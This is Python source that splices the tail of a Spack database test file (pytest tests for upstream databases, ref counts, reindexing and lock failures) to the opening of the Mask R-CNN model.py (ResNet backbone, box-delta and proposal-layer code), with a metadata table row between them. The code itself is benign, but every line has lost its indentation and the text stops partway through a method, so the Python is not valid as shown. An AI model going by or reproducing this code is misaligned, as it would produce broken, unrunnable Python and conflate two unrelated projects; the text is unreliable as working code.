def test_cannot_write_upstream(tmpdir_factory, test_store, gen_mock_layout):
roots = [str(tmpdir_factory.mktemp(x)) for x in ['a', 'b']]
layouts = [gen_mock_layout(x) for x in ['/ra/', '/rb/']]
x = MockPackage('x', [], [])
mock_repo = MockPackageMultiRepo([x])
# Instantiate the database that will be used as the upstream DB and make
# sure it has an index file
upstream_db_independent = spack.database.Database(roots[1])
with upstream_db_independent.write_transaction():
pass
upstream_dbs = spack.store._construct_upstream_dbs_from_install_roots(
[roots[1]], _test=True)
with spack.repo.swap(mock_repo):
spec = spack.spec.Spec('x')
spec.concretize()
with pytest.raises(spack.database.ForbiddenLockError):
upstream_dbs[0].add(spec, layouts[1])
@pytest.mark.usefixtures('config')
def test_recursive_upstream_dbs(tmpdir_factory, test_store, gen_mock_layout):
roots = [str(tmpdir_factory.mktemp(x)) for x in ['a', 'b', 'c']]
layouts = [gen_mock_layout(x) for x in ['/ra/', '/rb/', '/rc/']]
default = ('build', 'link')
z = MockPackage('z', [], [])
y = MockPackage('y', [z], [default])
x = MockPackage('x', [y], [default])
mock_repo = MockPackageMultiRepo([x, y, z])
with spack.repo.swap(mock_repo):
spec = spack.spec.Spec('x')
spec.concretize()
db_c = spack.database.Database(roots[2])
db_c.add(spec['z'], layouts[2])
db_b = spack.database.Database(roots[1], upstream_dbs=[db_c])
db_b.add(spec['y'], layouts[1])
db_a = spack.database.Database(roots[0], upstream_dbs=[db_b, db_c])
db_a.add(spec['x'], layouts[0])
upstream_dbs_from_scratch = (
spack.store._construct_upstream_dbs_from_install_roots(
[roots[1], roots[2]], _test=True))
db_a_from_scratch = spack.database.Database(
roots[0], upstream_dbs=upstream_dbs_from_scratch)
assert db_a_from_scratch.db_for_spec_hash(spec.dag_hash()) == (
db_a_from_scratch)
assert db_a_from_scratch.db_for_spec_hash(spec['y'].dag_hash()) == (
upstream_dbs_from_scratch[0])
assert db_a_from_scratch.db_for_spec_hash(spec['z'].dag_hash()) == (
upstream_dbs_from_scratch[1])
db_a_from_scratch._check_ref_counts()
upstream_dbs_from_scratch[0]._check_ref_counts()
upstream_dbs_from_scratch[1]._check_ref_counts()
assert (db_a_from_scratch.installed_relatives(spec) ==
set(spec.traverse(root=False)))
assert (db_a_from_scratch.installed_relatives(
spec['z'], direction='parents') == set([spec, spec['y']]))
@pytest.fixture()
def usr_folder_exists(monkeypatch):
"""The ``/usr`` folder is assumed to be existing in some tests. This
fixture makes it such that its existence is mocked, so we have no
requirements on the system running tests.
"""
isdir = os.path.isdir
@functools.wraps(os.path.isdir)
def mock_isdir(path):
if path == '/usr':
return True
return isdir(path)
monkeypatch.setattr(os.path, 'isdir', mock_isdir)
def _print_ref_counts():
"""Print out all ref counts for the graph used here, for debugging"""
recs = []
def add_rec(spec):
cspecs = spack.store.db.query(spec, installed=any)
if not cspecs:
recs.append("[ %-7s ] %-20s-" % ('', spec))
else:
key = cspecs[0].dag_hash()
rec = spack.store.db.get_record(cspecs[0])
recs.append("[ %-7s ] %-20s%d" % (key[:7], spec, rec.ref_count))
with spack.store.db.read_transaction():
add_rec('mpileaks ^mpich')
add_rec('callpath ^mpich')
add_rec('mpich')
add_rec('mpileaks ^mpich2')
add_rec('callpath ^mpich2')
add_rec('mpich2')
add_rec('mpileaks ^zmpi')
add_rec('callpath ^zmpi')
add_rec('zmpi')
add_rec('fake')
add_rec('dyninst')
add_rec('libdwarf')
add_rec('libelf')
colify(recs, cols=3)
def _check_merkleiness():
"""Ensure the spack database is a valid merkle graph."""
all_specs = spack.store.db.query(installed=any)
seen = {}
for spec in all_specs:
for dep in spec.dependencies():
hash_key = dep.dag_hash()
if hash_key not in seen:
seen[hash_key] = id(dep)
else:
assert seen[hash_key] == id(dep)
def _check_db_sanity(database):
"""Utiilty function to check db against install layout."""
pkg_in_layout = sorted(spack.store.layout.all_specs())
actual = sorted(database.query())
externals = sorted([x for x in actual if x.external])
nexpected = len(pkg_in_layout) + len(externals)
assert nexpected == len(actual)
non_external_in_db = sorted([x for x in actual if not x.external])
for e, a in zip(pkg_in_layout, non_external_in_db):
assert e == a
_check_merkleiness()
def _check_remove_and_add_package(database, spec):
"""Remove a spec from the DB, then add it and make sure everything's
still ok once it is added. This checks that it was
removed, that it's back when added again, and that ref
counts are consistent.
"""
original = database.query()
database._check_ref_counts()
# Remove spec
concrete_spec = database.remove(spec)
database._check_ref_counts()
remaining = database.query()
# ensure spec we removed is gone
assert len(original) - 1 == len(remaining)
assert all(s in original for s in remaining)
assert concrete_spec not in remaining
# add it back and make sure everything is ok.
database.add(concrete_spec, spack.store.layout)
installed = database.query()
assert concrete_spec in installed
assert installed == original
# sanity check against directory layout and check ref counts.
_check_db_sanity(database)
database._check_ref_counts()
def _mock_install(spec):
s = spack.spec.Spec(spec)
s.concretize()
pkg = spack.repo.get(s)
pkg.do_install(fake=True)
def _mock_remove(spec):
specs = spack.store.db.query(spec)
assert len(specs) == 1
spec = specs[0]
spec.package.do_uninstall(spec)
def test_default_queries(database):
# Testing a package whose name *doesn't* start with 'lib'
# to ensure the library has 'lib' prepended to the name
rec = database.get_record('zmpi')
spec = rec.spec
libraries = spec['zmpi'].libs
assert len(libraries) == 1
assert libraries.names[0] == 'zmpi'
headers = spec['zmpi'].headers
assert len(headers) == 1
assert headers.names[0] == 'zmpi'
command = spec['zmpi'].command
assert isinstance(command, Executable)
assert command.name == 'zmpi'
assert os.path.exists(command.path)
# Testing a package whose name *does* start with 'lib'
# to ensure the library doesn't have a double 'lib' prefix
rec = database.get_record('libelf')
spec = rec.spec
libraries = spec['libelf'].libs
assert len(libraries) == 1
assert libraries.names[0] == 'elf'
headers = spec['libelf'].headers
assert len(headers) == 1
assert headers.names[0] == 'libelf'
command = spec['libelf'].command
assert isinstance(command, Executable)
assert command.name == 'libelf'
assert os.path.exists(command.path)
def test_005_db_exists(database):
"""Make sure db cache file exists after creating."""
index_file = os.path.join(database.root, '.spack-db', 'index.json')
lock_file = os.path.join(database.root, '.spack-db', 'lock')
assert os.path.exists(str(index_file))
assert os.path.exists(str(lock_file))
def test_010_all_install_sanity(database):
"""Ensure that the install layout reflects what we think it does."""
all_specs = spack.store.layout.all_specs()
assert len(all_specs) == 14
# Query specs with multiple configurations
mpileaks_specs = [s for s in all_specs if s.satisfies('mpileaks')]
callpath_specs = [s for s in all_specs if s.satisfies('callpath')]
mpi_specs = [s for s in all_specs if s.satisfies('mpi')]
assert len(mpileaks_specs) == 3
assert len(callpath_specs) == 3
assert len(mpi_specs) == 3
# Query specs with single configurations
dyninst_specs = [s for s in all_specs if s.satisfies('dyninst')]
libdwarf_specs = [s for s in all_specs if s.satisfies('libdwarf')]
libelf_specs = [s for s in all_specs if s.satisfies('libelf')]
assert len(dyninst_specs) == 1
assert len(libdwarf_specs) == 1
assert len(libelf_specs) == 1
# Query by dependency
assert len(
[s for s in all_specs if s.satisfies('mpileaks ^mpich')]
) == 1
assert len(
[s for s in all_specs if s.satisfies('mpileaks ^mpich2')]
) == 1
assert len(
[s for s in all_specs if s.satisfies('mpileaks ^zmpi')]
) == 1
def test_015_write_and_read(mutable_database):
# write and read DB
with spack.store.db.write_transaction():
specs = spack.store.db.query()
recs = [spack.store.db.get_record(s) for s in specs]
for spec, rec in zip(specs, recs):
new_rec = spack.store.db.get_record(spec)
assert new_rec.ref_count == rec.ref_count
assert new_rec.spec == rec.spec
assert new_rec.path == rec.path
assert new_rec.installed == rec.installed
def test_020_db_sanity(database):
"""Make sure query() returns what's actually in the db."""
_check_db_sanity(database)
def test_025_reindex(mutable_database):
"""Make sure reindex works and ref counts are valid."""
spack.store.store.reindex()
_check_db_sanity(mutable_database)
def test_026_reindex_after_deprecate(mutable_database):
"""Make sure reindex works and ref counts are valid after deprecation."""
mpich = mutable_database.query_one('mpich')
zmpi = mutable_database.query_one('zmpi')
mutable_database.deprecate(mpich, zmpi)
spack.store.store.reindex()
_check_db_sanity(mutable_database)
def test_030_db_sanity_from_another_process(mutable_database):
def read_and_modify():
# check that other process can read DB
_check_db_sanity(mutable_database)
with mutable_database.write_transaction():
_mock_remove('mpileaks ^zmpi')
p = multiprocessing.Process(target=read_and_modify, args=())
p.start()
p.join()
# ensure child process change is visible in parent process
with mutable_database.read_transaction():
assert len(mutable_database.query('mpileaks ^zmpi')) == 0
def test_040_ref_counts(database):
"""Ensure that we got ref counts right when we read the DB."""
database._check_ref_counts()
def test_041_ref_counts_deprecate(mutable_database):
"""Ensure that we have appropriate ref counts after deprecating"""
mpich = mutable_database.query_one('mpich')
zmpi = mutable_database.query_one('zmpi')
mutable_database.deprecate(mpich, zmpi)
mutable_database._check_ref_counts()
def test_050_basic_query(database):
"""Ensure querying database is consistent with what is installed."""
# query everything
assert len(spack.store.db.query()) == 16
# query specs with multiple configurations
mpileaks_specs = database.query('mpileaks')
callpath_specs = database.query('callpath')
mpi_specs = database.query('mpi')
assert len(mpileaks_specs) == 3
assert len(callpath_specs) == 3
assert len(mpi_specs) == 3
# query specs with single configurations
dyninst_specs = database.query('dyninst')
libdwarf_specs = database.query('libdwarf')
libelf_specs = database.query('libelf')
assert len(dyninst_specs) == 1
assert len(libdwarf_specs) == 1
assert len(libelf_specs) == 1
# Query by dependency
assert len(database.query('mpileaks ^mpich')) == 1
assert len(database.query('mpileaks ^mpich2')) == 1
assert len(database.query('mpileaks ^zmpi')) == 1
# Query by date
assert len(database.query(start_date=datetime.datetime.min)) == 16
assert len(database.query(start_date=datetime.datetime.max)) == 0
assert len(database.query(end_date=datetime.datetime.min)) == 0
assert len(database.query(end_date=datetime.datetime.max)) == 16
def test_060_remove_and_add_root_package(mutable_database):
_check_remove_and_add_package(mutable_database, 'mpileaks ^mpich')
def test_070_remove_and_add_dependency_package(mutable_database):
_check_remove_and_add_package(mutable_database, 'dyninst')
def test_080_root_ref_counts(mutable_database):
rec = mutable_database.get_record('mpileaks ^mpich')
# Remove a top-level spec from the DB
mutable_database.remove('mpileaks ^mpich')
# record no longer in DB
assert mutable_database.query('mpileaks ^mpich', installed=any) == []
# record's deps have updated ref_counts
assert mutable_database.get_record('callpath ^mpich').ref_count == 0
assert mutable_database.get_record('mpich').ref_count == 1
# Put the spec back
mutable_database.add(rec.spec, spack.store.layout)
# record is present again
assert len(mutable_database.query('mpileaks ^mpich', installed=any)) == 1
# dependencies have ref counts updated
assert mutable_database.get_record('callpath ^mpich').ref_count == 1
assert mutable_database.get_record('mpich').ref_count == 2
def test_090_non_root_ref_counts(mutable_database):
mutable_database.get_record('mpileaks ^mpich')
mutable_database.get_record('callpath ^mpich')
# "force remove" a non-root spec from the DB
mutable_database.remove('callpath ^mpich')
# record still in DB but marked uninstalled
assert mutable_database.query('callpath ^mpich', installed=True) == []
assert len(mutable_database.query('callpath ^mpich', installed=any)) == 1
# record and its deps have same ref_counts
assert mutable_database.get_record(
'callpath ^mpich', installed=any
).ref_count == 1
assert mutable_database.get_record('mpich').ref_count == 2
    # Remove the only dependent of the uninstalled callpath record
mutable_database.remove('mpileaks ^mpich')
# record and parent are completely gone.
assert mutable_database.query('mpileaks ^mpich', installed=any) == []
assert mutable_database.query('callpath ^mpich', installed=any) == []
# mpich ref count updated properly.
mpich_rec = mutable_database.get_record('mpich')
assert mpich_rec.ref_count == 0
def test_100_no_write_with_exception_on_remove(database):
def fail_while_writing():
with database.write_transaction():
_mock_remove('mpileaks ^zmpi')
raise Exception()
with database.read_transaction():
assert len(database.query('mpileaks ^zmpi', installed=any)) == 1
with pytest.raises(Exception):
fail_while_writing()
# reload DB and make sure zmpi is still there.
with database.read_transaction():
assert len(database.query('mpileaks ^zmpi', installed=any)) == 1
def test_110_no_write_with_exception_on_install(database):
def fail_while_writing():
with database.write_transaction():
_mock_install('cmake')
raise Exception()
with database.read_transaction():
assert database.query('cmake', installed=any) == []
with pytest.raises(Exception):
fail_while_writing()
# reload DB and make sure cmake was not written.
with database.read_transaction():
assert database.query('cmake', installed=any) == []
def test_115_reindex_with_packages_not_in_repo(mutable_database):
    # Don't add any package definitions to this repository; the idea is that
    # packages should not have to be defined in the repository once they
    # are installed
with spack.repo.swap(MockPackageMultiRepo([])):
spack.store.store.reindex()
_check_db_sanity(mutable_database)
def test_external_entries_in_db(mutable_database):
rec = mutable_database.get_record('mpileaks ^zmpi')
assert rec.spec.external_path is None
assert rec.spec.external_module is None
rec = mutable_database.get_record('externaltool')
assert rec.spec.external_path == '/path/to/external_tool'
assert rec.spec.external_module is None
assert rec.explicit is False
rec.spec.package.do_install(fake=True, explicit=True)
rec = mutable_database.get_record('externaltool')
assert rec.spec.external_path == '/path/to/external_tool'
assert rec.spec.external_module is None
assert rec.explicit is True
@pytest.mark.regression('8036')
def test_regression_issue_8036(mutable_database, usr_folder_exists):
# The test ensures that the external package prefix is treated as
# existing. Even when the package prefix exists, the package should
# not be considered installed until it is added to the database with
# do_install.
s = spack.spec.Spec('externaltool@0.9')
s.concretize()
assert not s.package.installed
# Now install the external package and check again the `installed` property
s.package.do_install(fake=True)
assert s.package.installed
@pytest.mark.regression('11118')
def test_old_external_entries_prefix(mutable_database):
with open(spack.store.db._index_path, 'r') as f:
db_obj = json.loads(f.read())
s = spack.spec.Spec('externaltool')
s.concretize()
db_obj['database']['installs'][s.dag_hash()]['path'] = 'None'
with open(spack.store.db._index_path, 'w') as f:
f.write(json.dumps(db_obj))
record = spack.store.db.get_record(s)
assert record.path is None
assert record.spec._prefix is None
assert record.spec.prefix == record.spec.external_path
def test_uninstall_by_spec(mutable_database):
with mutable_database.write_transaction():
for spec in mutable_database.query():
if spec.package.installed:
spack.package.PackageBase.uninstall_by_spec(spec, force=True)
else:
mutable_database.remove(spec)
assert len(mutable_database.query()) == 0
def test_query_unused_specs(mutable_database):
# This spec installs a fake cmake as a build only dependency
s = spack.spec.Spec('simple-inheritance')
s.concretize()
s.package.do_install(fake=True, explicit=True)
unused = spack.store.db.unused_specs
assert len(unused) == 1
assert unused[0].name == 'cmake'
@pytest.mark.regression('10019')
def test_query_spec_with_conditional_dependency(mutable_database):
# The issue is triggered by having dependencies that are
# conditional on a Boolean variant
s = spack.spec.Spec('hdf5~mpi')
s.concretize()
s.package.do_install(fake=True, explicit=True)
results = spack.store.db.query_local('hdf5 ^mpich')
assert not results
@pytest.mark.regression('10019')
def test_query_spec_with_non_conditional_virtual_dependency(database):
    # Ensure the same issue doesn't come up for virtual
    # dependencies that are not conditional on variants
results = spack.store.db.query_local('mpileaks ^mpich')
assert len(results) == 1
def test_failed_spec_path_error(database):
"""Ensure spec not concrete check is covered."""
s = spack.spec.Spec('a')
    with pytest.raises(ValueError, match='Concrete spec required'):
spack.store.db._failed_spec_path(s)
@pytest.mark.db
def test_clear_failure_keep(mutable_database, monkeypatch, capfd):
"""Add test coverage for clear_failure operation when to be retained."""
def _is(db, spec):
return True
# Pretend the spec has been failure locked
monkeypatch.setattr(spack.database.Database, 'prefix_failure_locked', _is)
s = spack.spec.Spec('a')
spack.store.db.clear_failure(s)
out = capfd.readouterr()[0]
assert 'Retaining failure marking' in out
@pytest.mark.db
def test_clear_failure_forced(mutable_database, monkeypatch, capfd):
"""Add test coverage for clear_failure operation when force."""
def _is(db, spec):
return True
# Pretend the spec has been failure locked
monkeypatch.setattr(spack.database.Database, 'prefix_failure_locked', _is)
    # Ensure an OSError is raised when trying to remove the non-existent marking
monkeypatch.setattr(spack.database.Database, 'prefix_failure_marked', _is)
s = spack.spec.Spec('a').concretized()
spack.store.db.clear_failure(s, force=True)
out = capfd.readouterr()[1]
assert 'Removing failure marking despite lock' in out
assert 'Unable to remove failure marking' in out
@pytest.mark.db
def test_mark_failed(mutable_database, monkeypatch, tmpdir, capsys):
"""Add coverage to mark_failed."""
def _raise_exc(lock):
raise lk.LockTimeoutError('Mock acquire_write failure')
# Ensure attempt to acquire write lock on the mark raises the exception
monkeypatch.setattr(lk.Lock, 'acquire_write', _raise_exc)
with tmpdir.as_cwd():
s = spack.spec.Spec('a').concretized()
spack.store.db.mark_failed(s)
out = str(capsys.readouterr()[1])
assert 'Unable to mark a as failed' in out
# Clean up the failure mark to ensure it does not interfere with other
# tests using the same spec.
del spack.store.db._prefix_failures[s.prefix]
@pytest.mark.db
def test_prefix_failed(mutable_database, monkeypatch):
"""Add coverage to prefix_failed operation."""
def _is(db, spec):
return True
s = spack.spec.Spec('a').concretized()
# Confirm the spec is not already marked as failed
assert not spack.store.db.prefix_failed(s)
# Check that a failure entry is sufficient
spack.store.db._prefix_failures[s.prefix] = None
assert spack.store.db.prefix_failed(s)
# Remove the entry and check again
del spack.store.db._prefix_failures[s.prefix]
assert not spack.store.db.prefix_failed(s)
# Now pretend that the prefix failure is locked
monkeypatch.setattr(spack.database.Database, 'prefix_failure_locked', _is)
assert spack.store.db.prefix_failed(s)
def test_prefix_read_lock_error(mutable_database, monkeypatch):
"""Cover the prefix read lock exception."""
def _raise(db, spec):
raise lk.LockError('Mock lock error')
s = spack.spec.Spec('a').concretized()
# Ensure subsequent lock operations fail
monkeypatch.setattr(lk.Lock, 'acquire_read', _raise)
with pytest.raises(Exception):
with spack.store.db.prefix_read_lock(s):
assert False
def test_prefix_write_lock_error(mutable_database, monkeypatch):
"""Cover the prefix write lock exception."""
def _raise(db, spec):
raise lk.LockError('Mock lock error')
s = spack.spec.Spec('a').concretized()
# Ensure subsequent lock operations fail
monkeypatch.setattr(lk.Lock, 'acquire_write', _raise)
with pytest.raises(Exception):
with spack.store.db.prefix_write_lock(s):
assert False
| 33.177419 | 79 | 0.689076 |
cf79ba7e896156a665b7263fbfbcd91919ff4efa | 127,142 | py | Python | mrcnn/model.py | protohaus/Mask_RCNN | 0e1f64a9d57863f398444e2ba4a2bb547c7c83f6 | ["MIT"] | null | null | null | mrcnn/model.py | protohaus/Mask_RCNN | 0e1f64a9d57863f398444e2ba4a2bb547c7c83f6 | ["MIT"] | null | null | null | mrcnn/model.py | protohaus/Mask_RCNN | 0e1f64a9d57863f398444e2ba4a2bb547c7c83f6 | ["MIT"] | null | null | null |
"""
Mask R-CNN
The main Mask R-CNN model implementation.
Copyright (c) 2017 Matterport, Inc.
Licensed under the MIT License (see LICENSE for details)
Written by Waleed Abdulla
"""
import os
import datetime
import re
import math
from collections import OrderedDict
import multiprocessing
import numpy as np
import tensorflow as tf
import tensorflow.keras as keras
import tensorflow.keras.backend as K
import tensorflow.keras.layers as KL
import tensorflow.keras.layers as KE
import tensorflow.keras.utils as KU
from tensorflow.python.eager import context
import tensorflow.keras.models as KM
from mrcnn import utils
# Requires TensorFlow 2.0+
from distutils.version import LooseVersion
assert LooseVersion(tf.__version__) >= LooseVersion("2.0")
tf.compat.v1.disable_eager_execution()
############################################################
# Utility Functions
############################################################
def log(text, array=None):
"""Prints a text message. And, optionally, if a Numpy array is provided it
    prints its shape, min, and max values.
"""
if array is not None:
text = text.ljust(25)
text += ("shape: {:20} ".format(str(array.shape)))
if array.size:
text += ("min: {:10.5f} max: {:10.5f}".format(array.min(),array.max()))
else:
text += ("min: {:10} max: {:10}".format("",""))
text += " {}".format(array.dtype)
print(text)
class BatchNorm(KL.BatchNormalization):
"""Extends the Keras BatchNormalization class to allow a central place
to make changes if needed.
    Batch normalization has a negative effect on training if batches are small,
    so this layer is often frozen (via a setting in the Config class) and
    functions as a linear layer.
"""
def call(self, inputs, training=None):
"""
Note about training values:
None: Train BN layers. This is the normal mode
False: Freeze BN layers. Good when batch size is small
True: (don't use). Set layer in training mode even when making inferences
"""
return super(self.__class__, self).call(inputs, training=training)
def compute_backbone_shapes(config, image_shape):
"""Computes the width and height of each stage of the backbone network.
Returns:
[N, (height, width)]. Where N is the number of stages
"""
if callable(config.BACKBONE):
return config.COMPUTE_BACKBONE_SHAPE(image_shape)
# Currently supports ResNet only
assert config.BACKBONE in ["resnet50", "resnet101"]
return np.array(
[[int(math.ceil(image_shape[0] / stride)),
int(math.ceil(image_shape[1] / stride))]
for stride in config.BACKBONE_STRIDES])
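# --- Illustrative sketch (not part of the original model.py) -----------------
# Worked example of the stage-shape computation above, assuming the commonly
# used BACKBONE_STRIDES of [4, 8, 16, 32, 64] and a 1024x1024 input. Each stage
# shape is ceil(image_dim / stride), giving
# [[256, 256], [128, 128], [64, 64], [32, 32], [16, 16]].
def _example_backbone_shapes(image_shape=(1024, 1024, 3),
                             strides=(4, 8, 16, 32, 64)):
    """Hypothetical helper mirroring compute_backbone_shapes() with numpy only."""
    return np.array(
        [[int(math.ceil(image_shape[0] / stride)),
          int(math.ceil(image_shape[1] / stride))]
         for stride in strides])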
############################################################
# Resnet Graph
############################################################
# Code adopted from:
# https://github.com/fchollet/deep-learning-models/blob/master/resnet50.py
def identity_block(input_tensor, kernel_size, filters, stage, block,
use_bias=True, train_bn=True):
"""The identity_block is the block that has no conv layer at shortcut
# Arguments
input_tensor: input tensor
kernel_size: default 3, the kernel size of middle conv layer at main path
filters: list of integers, the nb_filters of 3 conv layer at main path
stage: integer, current stage label, used for generating layer names
block: 'a','b'..., current block label, used for generating layer names
use_bias: Boolean. To use or not use a bias in conv layers.
train_bn: Boolean. Train or freeze Batch Norm layers
"""
nb_filter1, nb_filter2, nb_filter3 = filters
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
x = KL.Conv2D(nb_filter1, (1, 1), name=conv_name_base + '2a',
use_bias=use_bias)(input_tensor)
x = BatchNorm(name=bn_name_base + '2a')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.Conv2D(nb_filter2, (kernel_size, kernel_size), padding='same',
name=conv_name_base + '2b', use_bias=use_bias)(x)
x = BatchNorm(name=bn_name_base + '2b')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.Conv2D(nb_filter3, (1, 1), name=conv_name_base + '2c',
use_bias=use_bias)(x)
x = BatchNorm(name=bn_name_base + '2c')(x, training=train_bn)
x = KL.Add()([x, input_tensor])
x = KL.Activation('relu', name='res' + str(stage) + block + '_out')(x)
return x
def conv_block(input_tensor, kernel_size, filters, stage, block,
strides=(2, 2), use_bias=True, train_bn=True):
"""conv_block is the block that has a conv layer at shortcut
# Arguments
input_tensor: input tensor
kernel_size: default 3, the kernel size of middle conv layer at main path
filters: list of integers, the nb_filters of 3 conv layer at main path
stage: integer, current stage label, used for generating layer names
block: 'a','b'..., current block label, used for generating layer names
use_bias: Boolean. To use or not use a bias in conv layers.
train_bn: Boolean. Train or freeze Batch Norm layers
    Note that from stage 3, the first conv layer in the main path uses strides=(2, 2),
    and the shortcut uses strides=(2, 2) as well.
"""
nb_filter1, nb_filter2, nb_filter3 = filters
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
x = KL.Conv2D(nb_filter1, (1, 1), strides=strides,
name=conv_name_base + '2a', use_bias=use_bias)(input_tensor)
x = BatchNorm(name=bn_name_base + '2a')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.Conv2D(nb_filter2, (kernel_size, kernel_size), padding='same',
name=conv_name_base + '2b', use_bias=use_bias)(x)
x = BatchNorm(name=bn_name_base + '2b')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.Conv2D(nb_filter3, (1, 1), name=conv_name_base +
'2c', use_bias=use_bias)(x)
x = BatchNorm(name=bn_name_base + '2c')(x, training=train_bn)
shortcut = KL.Conv2D(nb_filter3, (1, 1), strides=strides,
name=conv_name_base + '1', use_bias=use_bias)(input_tensor)
shortcut = BatchNorm(name=bn_name_base + '1')(shortcut, training=train_bn)
x = KL.Add()([x, shortcut])
x = KL.Activation('relu', name='res' + str(stage) + block + '_out')(x)
return x
def resnet_graph(input_image, architecture, stage5=False, train_bn=True):
"""Build a ResNet graph.
architecture: Can be resnet50 or resnet101
stage5: Boolean. If False, stage5 of the network is not created
train_bn: Boolean. Train or freeze Batch Norm layers
"""
assert architecture in ["resnet50", "resnet101"]
# Stage 1
x = KL.ZeroPadding2D((3, 3))(input_image)
x = KL.Conv2D(64, (7, 7), strides=(2, 2), name='conv1', use_bias=True)(x)
x = BatchNorm(name='bn_conv1')(x, training=train_bn)
x = KL.Activation('relu')(x)
C1 = x = KL.MaxPooling2D((3, 3), strides=(2, 2), padding="same")(x)
# Stage 2
x = conv_block(x, 3, [64, 64, 256], stage=2, block='a', strides=(1, 1), train_bn=train_bn)
x = identity_block(x, 3, [64, 64, 256], stage=2, block='b', train_bn=train_bn)
C2 = x = identity_block(x, 3, [64, 64, 256], stage=2, block='c', train_bn=train_bn)
# Stage 3
x = conv_block(x, 3, [128, 128, 512], stage=3, block='a', train_bn=train_bn)
x = identity_block(x, 3, [128, 128, 512], stage=3, block='b', train_bn=train_bn)
x = identity_block(x, 3, [128, 128, 512], stage=3, block='c', train_bn=train_bn)
C3 = x = identity_block(x, 3, [128, 128, 512], stage=3, block='d', train_bn=train_bn)
# Stage 4
x = conv_block(x, 3, [256, 256, 1024], stage=4, block='a', train_bn=train_bn)
block_count = {"resnet50": 5, "resnet101": 22}[architecture]
for i in range(block_count):
x = identity_block(x, 3, [256, 256, 1024], stage=4, block=chr(98 + i), train_bn=train_bn)
C4 = x
# Stage 5
if stage5:
x = conv_block(x, 3, [512, 512, 2048], stage=5, block='a', train_bn=train_bn)
x = identity_block(x, 3, [512, 512, 2048], stage=5, block='b', train_bn=train_bn)
C5 = x = identity_block(x, 3, [512, 512, 2048], stage=5, block='c', train_bn=train_bn)
else:
C5 = None
return [C1, C2, C3, C4, C5]
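# --- Illustrative sketch (not part of the original model.py) -----------------
# Minimal example of wiring resnet_graph() to a Keras input to obtain the
# C2..C5 feature maps that the FPN consumes. The 1024x1024x3 input size and the
# "resnet101" choice are assumptions for illustration only.
def _example_build_resnet_backbone():
    input_image = KL.Input(shape=[1024, 1024, 3], name="example_input_image")
    _, C2, C3, C4, C5 = resnet_graph(input_image, "resnet101",
                                     stage5=True, train_bn=False)
    # Wrap the outputs in a model so they can be inspected, e.g. via summary().
    return KM.Model(inputs=input_image, outputs=[C2, C3, C4, C5],
                    name="example_resnet_backbone")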
############################################################
# Proposal Layer
############################################################
def apply_box_deltas_graph(boxes, deltas):
"""Applies the given deltas to the given boxes.
boxes: [N, (y1, x1, y2, x2)] boxes to update
deltas: [N, (dy, dx, log(dh), log(dw))] refinements to apply
"""
# Convert to y, x, h, w
height = boxes[:, 2] - boxes[:, 0]
width = boxes[:, 3] - boxes[:, 1]
center_y = boxes[:, 0] + 0.5 * height
center_x = boxes[:, 1] + 0.5 * width
# Apply deltas
center_y += deltas[:, 0] * height
center_x += deltas[:, 1] * width
height *= tf.exp(deltas[:, 2])
width *= tf.exp(deltas[:, 3])
# Convert back to y1, x1, y2, x2
y1 = center_y - 0.5 * height
x1 = center_x - 0.5 * width
y2 = y1 + height
x2 = x1 + width
result = tf.stack([y1, x1, y2, x2], axis=1, name="apply_box_deltas_out")
return result
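# --- Illustrative sketch (not part of the original model.py) -----------------
# The same box-delta math as apply_box_deltas_graph(), written with plain numpy
# for a single box so the refinement is easy to verify by hand. For example,
# box (0, 0, 10, 10) with deltas (0.1, 0.1, 0.0, 0.0) shifts its center by 10%
# of its height/width, keeps its size, and becomes (1, 1, 11, 11).
def _example_apply_box_delta_numpy(box, delta):
    """Hypothetical helper; box = (y1, x1, y2, x2), delta = (dy, dx, log(dh), log(dw))."""
    y1, x1, y2, x2 = box
    dy, dx, log_dh, log_dw = delta
    height, width = y2 - y1, x2 - x1
    center_y = y1 + 0.5 * height + dy * height
    center_x = x1 + 0.5 * width + dx * width
    height *= np.exp(log_dh)
    width *= np.exp(log_dw)
    new_y1 = center_y - 0.5 * height
    new_x1 = center_x - 0.5 * width
    return new_y1, new_x1, new_y1 + height, new_x1 + width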
def clip_boxes_graph(boxes, window):
"""
boxes: [N, (y1, x1, y2, x2)]
window: [4] in the form y1, x1, y2, x2
"""
# Split
wy1, wx1, wy2, wx2 = tf.split(window, 4)
y1, x1, y2, x2 = tf.split(boxes, 4, axis=1)
# Clip
y1 = tf.maximum(tf.minimum(y1, wy2), wy1)
x1 = tf.maximum(tf.minimum(x1, wx2), wx1)
y2 = tf.maximum(tf.minimum(y2, wy2), wy1)
x2 = tf.maximum(tf.minimum(x2, wx2), wx1)
clipped = tf.concat([y1, x1, y2, x2], axis=1, name="clipped_boxes")
clipped.set_shape((clipped.shape[0], 4))
return clipped
class ProposalLayer(KE.Layer):
"""Receives anchor scores and selects a subset to pass as proposals
to the second stage. Filtering is done based on anchor scores and
non-max suppression to remove overlaps. It also applies bounding
box refinement deltas to anchors.
Inputs:
rpn_probs: [batch, num_anchors, (bg prob, fg prob)]
rpn_bbox: [batch, num_anchors, (dy, dx, log(dh), log(dw))]
anchors: [batch, num_anchors, (y1, x1, y2, x2)] anchors in normalized coordinates
Returns:
Proposals in normalized coordinates [batch, rois, (y1, x1, y2, x2)]
"""
def __init__(self, proposal_count, nms_threshold, config=None, **kwargs):
super(ProposalLayer, self).__init__(**kwargs)
self.config = config
self.proposal_count = proposal_count
self.nms_threshold = nms_threshold
def get_config(self):
config = super(ProposalLayer, self).get_config()
config["config"] = self.config.to_dict()
config["proposal_count"] = self.proposal_count
config["nms_threshold"] = self.nms_threshold
return config
def call(self, inputs):
# Box Scores. Use the foreground class confidence. [Batch, num_rois, 1]
scores = inputs[0][:, :, 1]
# Box deltas [batch, num_rois, 4]
deltas = inputs[1]
deltas = deltas * np.reshape(self.config.RPN_BBOX_STD_DEV, [1, 1, 4])
# Anchors
anchors = inputs[2]
# Improve performance by trimming to top anchors by score
# and doing the rest on the smaller subset.
pre_nms_limit = tf.minimum(self.config.PRE_NMS_LIMIT, tf.shape(input=anchors)[1])
ix = tf.nn.top_k(scores, pre_nms_limit, sorted=True,
name="top_anchors").indices
